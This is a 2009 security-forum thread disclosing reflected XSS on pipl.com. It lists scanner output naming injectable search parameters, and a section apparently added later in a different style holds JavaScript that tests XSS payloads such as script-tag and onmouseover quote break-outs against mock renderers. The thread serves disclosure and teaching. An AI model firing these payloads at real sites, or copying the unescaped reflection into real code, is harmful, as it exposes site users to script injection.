Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Pipl xss issues
Posted by: holiman
Date: January 30, 2009 07:59AM

PDP wrote about Pipl.com (http://www.gnucitizen.org/blog/deep-inspection-of-online-personas/), so I tested it, and at the same time tested the little xss-tool I wrote about under Projects. I made a search for Joe Dimaggio, and then tested the resulting page for xss. That is a site that has issues.

Related question: if a site allows < ' into a <input value="foo<>''" ... - is that exploitable in any way? They do that a lot, but in a few places they fail all three.


0 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?FirstName=Joehzg<izg"jzg'gzh&LastName=DiMaggio&City=&State=&Country=SE&CategoryID=2&Interface=1&
1 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?FirstName=Joe&LastName=DiMaggiohzg<izg"jzg'gzh&City=&State=&Country=SE&CategoryID=2&Interface=1&
2 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?FirstName=Joe&LastName=DiMaggio&City=hzg<izg"jzg'gzh&State=&Country=SE&CategoryID=2&Interface=1&
5 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?FirstName=Joe&LastName=DiMaggio&City=&State=&Country=SE&CategoryID=2hzg<izg"jzg'gzh&Interface=1&
67 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?CategoryID=2hzg<izg"jzg'gzh&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joseph&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
70 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggiohzg<izg"jzg'gzh&FirstName=Joseph&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
71 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josephhzg<izg"jzg'gzh&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
73 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joseph&Hint=&City=hzg<izg"jzg'gzh&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
82 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?CategoryID=2hzg<izg"jzg'gzh&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joshua&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
85 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggiohzg<izg"jzg'gzh&FirstName=Joshua&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
86 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joshuahzg<izg"jzg'gzh&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
88 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Joshua&Hint=&City=hzg<izg"jzg'gzh&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
97 | UNSAFE | Unfiltered chars: < " ' |http://www.pipl.com/search/?CategoryID=2hzg<izg"jzg'gzh&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josiah&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
100 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggiohzg<izg"jzg'gzh&FirstName=Josiah&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
101 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josiahhzg<izg"jzg'gzh&Hint=&City=&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&
103 | UNSAFE | Unfiltered chars: < ' |http://www.pipl.com/search/?CategoryID=2&Interface=15&UserCountry=SE&LastName=DiMaggio&FirstName=Josiah&Hint=&City=hzg<izg"jzg'gzh&State=&StateFullName=&Country=SE&Country3=SWE&CountryFullName=Sweden&QueryString=%22Joe+DiMaggio%22&QueryStringQuoted=%22Joe+DiMaggio%22&QueryStringUnquoted=Joe+DiMaggio&

Re: Pipl xss issues
Posted by: Matt Presson
Date: January 30, 2009 08:56AM

If the input is being returned in an attribute, a better question would be whether they allow the double quote. If so, then try > and <. If they don't allow the double quote - or whatever character they are using to enclose the attribute value - then you are stuck - at least on that attribute.

-----------------------------------------------------------------------
(ú=(θ='',[µ=!(Φ=!θ+{})+θ,Θ=Φ[ø=+!θ]+Φ[+θ],ĩ=µ[ø],Ø=µ[º=ø+++ø],Ç=Φ[º+ø],à=ú[Φ[º+º]+Φ[+θ]+Ç+ĩ]][Ø+Ç+Θ])())[ĩ+à('•êí')](Ç+à('Á«)'))
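The attribute-context question from the first post and the answer above, as an added worked example (not pipl's code, not holiman's scanner, and not Matt's). It assumes three hypothetical server-side renderers that reflect a search field into <input value="...">: one stripping only the double quote, as the "< '" rows of the scan suggest, one filtering nothing, as the '< " \'' rows for CategoryID suggest, and one that attribute-encodes properly. A small start-tag tokenizer, written to follow the HTML "attribute value (double-quoted)" state, then reports whether the reflected text ever leaves the attribute. The payloads are constructed for the example.

```javascript
// Added example for this thread (not pipl's code or holiman's tool).
// Three hypothetical renderers reflect a search field into <input value="...">
// and a small start-tag tokenizer checks whether the reflected text leaves
// that attribute.

// Renderer modelled on the "< '" rows of the scan: only " is stripped.
function renderStripQuote(input) {
  return '<input type="text" name="FirstName" value="' +
    input.replace(/"/g, "") + '">';
}

// Renderer modelled on the '< " \'' rows: nothing is filtered.
function renderNoFilter(input) {
  return '<input type="text" name="FirstName" value="' + input + '">';
}

// Correct renderer: HTML-attribute-encode every metacharacter.
function renderEscaped(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return '<input type="text" name="FirstName" value="' +
    input.replace(/[&<>"']/g, (c) => map[c]) + '">';
}

// Tokenize one start tag the way a browser does: inside a double-quoted value
// only `"` ends the value; `<`, `'`, `>`, NUL and `--!>` are plain characters
// there. Returns the tag name, its attributes (first occurrence wins, as in
// HTML) and whatever text follows the closing `>`.
function parseStartTag(html) {
  let i = 0;
  if (html[i] !== "<") throw new Error("expected a start tag");
  i++;
  let tag = "";
  while (i < html.length && /[A-Za-z0-9]/.test(html[i])) tag += html[i++];
  const attrs = {};
  for (;;) {
    while (i < html.length && /\s/.test(html[i])) i++;
    if (i >= html.length) return { tag, attrs, rest: "" }; // unterminated tag
    if (html[i] === ">") { i++; break; }
    if (html[i] === "/") { i++; continue; }              // stray solidus, ignored
    let name = "";
    while (i < html.length && !/[\s=>\/]/.test(html[i])) name += html[i++];
    while (i < html.length && /\s/.test(html[i])) i++;
    let value = "";
    if (html[i] === "=") {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < html.length && html[i] !== q) value += html[i++];
        i++;                                               // closing quote
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
      }
    }
    name = name.toLowerCase();
    if (name && !(name in attrs)) attrs[name] = value;
  }
  return { tag, attrs, rest: html.slice(i) };
}

const TEMPLATE_ATTRS = ["type", "name", "value"];

// Render the payload, parse the result and report whether anything ended up
// outside the value attribute: an extra attribute, or text after the tag.
function assess(render, payload) {
  const html = render(payload);
  const tag = parseStartTag(html);
  const injectedAttrs = Object.keys(tag.attrs).filter((a) => !TEMPLATE_ATTRS.includes(a));
  return {
    html,
    value: tag.attrs.value,
    injectedAttrs,
    trailing: tag.rest,
    breaksOut: injectedAttrs.length > 0 || tag.rest.length > 0,
  };
}

// Constructed payloads: the ideas from the question plus the quote break-out.
const PAYLOADS = {
  angleAndSingle: "'><script>alert(1)</script>",      // only < ' > (no ")
  commentClose:   "--!><script>alert(1)</script>",    // the --!> idea
  nul:            "x\u0000><script>alert(1)</script>", // the %00 idea
  doubleQuote:    'x" onmouseover="alert(1)',          // needs " to survive
};

// Run every payload through every renderer; true means it escaped the attribute.
function demo() {
  const results = {};
  const renderers = { renderStripQuote, renderNoFilter, renderEscaped };
  for (const [rName, render] of Object.entries(renderers)) {
    for (const [pName, payload] of Object.entries(PAYLOADS)) {
      results[rName + "/" + pName] = assess(render, payload).breaksOut;
    }
  }
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [k, v] of Object.entries(demo())) console.log(v ? "BREAKS OUT" : "contained ", k);
}
```

Only the unfiltered renderer with the `"`-based payload escapes; `'`, `<`, `>`, `--!>` and a NUL byte all stay inside a double-quoted value, because the tokenizer leaves that state only on `"` (a real browser turns the NUL into U+FFFD, which changes nothing here). So with the quote stripped you are indeed stuck on that attribute; the practical next steps are the rows of the scan where `"` does pass through (the CategoryID ones), or a reflection point that is dangerous without a break-out, such as an event-handler or URL attribute.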

Re: Pipl xss issues
Posted by: holiman
Date: January 30, 2009 11:37AM

Yeah, well, if they allow " then it's trivial. I was wondering if there is any other way to break out, --!> or some %00-sign or anything. Guess not.
